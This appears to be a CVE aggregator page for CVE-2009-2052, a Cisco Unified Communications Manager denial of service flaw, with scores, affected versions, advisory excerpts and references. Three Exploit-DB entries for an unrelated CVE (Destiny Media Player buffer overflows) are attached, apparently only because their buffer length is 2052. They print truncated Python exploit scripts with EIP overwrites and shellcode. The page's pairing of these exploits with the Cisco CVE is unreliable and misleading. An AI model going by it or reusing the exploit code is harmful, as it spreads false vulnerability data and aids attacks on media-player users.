CVE-2009-2052
published 2009-08-27CVE-2009-2052: Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 4.x, 5.x before 5.1(3g), 6.x before 6.1(4), 7.0 before 7.0(2), and 7.1 before 7.1(2); and…
PriorityP338high7.8CVSS 2.0
AVNACLAuNCNINAC
EPSS
3.98%
89.4th percentile
Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 4.x, 5.x before 5.1(3g), 6.x before 6.1(4), 7.0 before 7.0(2), and 7.1 before 7.1(2); and Cisco Unified Presence 1.x, 6.x before 6.0(6), and 7.x before 7.0(4); allows remote attackers to cause a denial of service (TCP services outage) via a large number of TCP connections, related to "tracking of network connections," aka Bug IDs CSCsq22534 and CSCsw52371.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | unified_communications_manager | — | — |
| cisco | unified_communications_manager | >= 5.0 < 5.1\(3g\) | 5.1\(3g\) |
| cisco | unified_communications_manager | >= 6.1\(1\) < 6.1\(4\) | 6.1\(4\) |
| cisco | unified_communications_manager | >= 7.0 < 7.0\(2\) | 7.0\(2\) |
| cisco | unified_communications_manager | >= 7.1 < 7.1\(2\) | 7.1\(2\) |
CVSS provenance
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
vendor_cisco7.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Cisco Unified Communications Manager Denial of Service Vulnerabilities
vendor_cisco·2009-08-26·CVSS 7.8
CVE-2009-2050 [HIGH] CWE-399 Cisco Unified Communications Manager Denial of Service Vulnerabilities
Cisco Unified Communications Manager Denial of Service Vulnerabilities
Cisco Unified Communications Manager (formerly CallManager) contains
multiple denial of service (DoS) vulnerabilities that if exploited could cause
an interruption to voice services. The Session Initiation Protocol (SIP) and
Skinny Client Control Protocol (SCCP) services are affected by these
vulnerabilities.
Cisco has released free software updates for select Cisco Unified
Communications Manager versions that address these vulnerabilities. There are
no workarounds for these vulnerabilities.
This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20090826-cucm.
Cisco
Cisco Unified Communications Manager Denial of Service Vulnerabilities
vendor_cisco
CVE-2009-2052 Cisco Unified Communications Manager Denial of Service Vulnerabilities
CVE-2009-2052: Cisco Unified Communications Manager Denial of Service Vulnerabilities
Cisco Unified Communications Manager (formerly CallManager) contains multiple denial of service (DoS) vulnerabilities that if exploited could cause an interruption to voice services. The Session Initiation Protocol (SIP) and Skinny Client Control Protocol (SCCP) services are affected by these vulnerabilities. Cisco has released free software updates for select Cisco Unified Communications Manager versions that address these vulnerabilities. There are no
CWE: CWE-399, CWE-399
Bug IDs: CSCsz43987, CSCta20040, CSCtf72678, CSCsi46466, CSCsz40392
GHSA
GHSA-qj8c-mx4x-hh37: Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 4
ghsa_unreviewed·2022-05-02
CVE-2009-2052 [HIGH] GHSA-qj8c-mx4x-hh37: Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 4
Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 4.x, 5.x before 5.1(3g), 6.x before 6.1(4), 7.0 before 7.0(2), and 7.1 before 7.1(2); and Cisco Unified Presence 1.x, 6.x before 6.0(6), and 7.x before 7.0(4); allows remote attackers to cause a denial of service (TCP services outage) via a large number of TCP connections, related to "tracking of network connections," aka Bug IDs CSCsq22534 and CSCsw52371.
No detection rules found.
Exploit-DB
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
exploitdb·2009-01-04
CVE-2009-3429 Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (1)
---
# Destiny Media Player 1.61 (lst File) Local Buffer overflow Exploit
# By:Encrypt3d.M!nd
#
# i was so stupid when i wrote the poc coz i didn't realize somethings :p
# well this is workin exploit tested on windows xp sp3
# don't double click the file,import it from the program
#
# Greetz:-=Mizo=-(thnx dude :X),L!0N,El Mariachi,MiNi SpIder,all my friends
#
chars = "A" * 2052
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164
Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13"
"\x88\x79\x7b\x83\xeb\xfc\xe2\xf4\xef\x60\x3d\x7b\x13\x88\xf2\x3e"
"\x2f\x03\x05\x7e\x6b\x89\x96\xf0\x5c\x90\xf2\x24\x33\x89\x92\x32"
"\x98\xbc\xf2\x7a\xfd\xb9\xb9\xe2\xbf\x0c\xb9
Exploit-DB
Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
exploitdb·2009-01-03
CVE-2009-3429 Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
Destiny Media Player 1.61 - '.m3u' Local Stack Overflow
---
#usage: exploit.py
#After creating the m3u file, start the program then File > Open Playlist > exploit.m3u
print "**************************************************************************"
print " Destiny Media Player 1.61 (.m3u File) Local Stack Overflow Exploit\n"
print " Founder: aBo MoHaMeD"
print " exploit & code: His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
buff = "\x41" * 2052
EIP = "\x5D\x38\x82\x7C" #call ESP from kernel32.dll
nop = "\x90" * 10 #Blah Blah :D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode =
Exploit-DB
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
exploitdb·2009-01-03
CVE-2009-3429 Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)
---
#
# Destiny Media Player (lst file) Buffer overflow PoC
# By:Encrypt3d.M!nd
# I'am Iraqian...Not Arabian
###########################################
# Well,i've tried to write an exploit for this shit but i couldn't
# the address after the NEW eip will over written,if anyone
# knows how to exploit this,be my guest
chars = "A"*2052
eip = "\x42\x42\x42\x42" # the eip will become 42424242
file=open('exp.lst','w')
file.write(chars+eip+chars)
file.close()
# milw0rm.com [2009-01-03]
No writeups or analysis indexed.
http://secunia.com/advisories/36498http://secunia.com/advisories/36499http://secunia.com/advisories/37039http://securitytracker.com/id?1023018http://www.cisco.com/en/US/products/products_security_advisory09186a0080af2d11.shtmlhttp://www.cisco.com/en/US/products/products_security_advisory09186a0080afc930.shtmlhttp://www.securityfocus.com/bid/36152http://www.securityfocus.com/bid/36676http://www.securitytracker.com/id?1022775http://www.vupen.com/english/advisories/2009/2915http://secunia.com/advisories/36498http://secunia.com/advisories/36499http://secunia.com/advisories/37039http://securitytracker.com/id?1023018http://www.cisco.com/en/US/products/products_security_advisory09186a0080af2d11.shtmlhttp://www.cisco.com/en/US/products/products_security_advisory09186a0080afc930.shtmlhttp://www.securityfocus.com/bid/36152http://www.securityfocus.com/bid/36676http://www.securitytracker.com/id?1022775http://www.vupen.com/english/advisories/2009/2915
2009-08-27
Published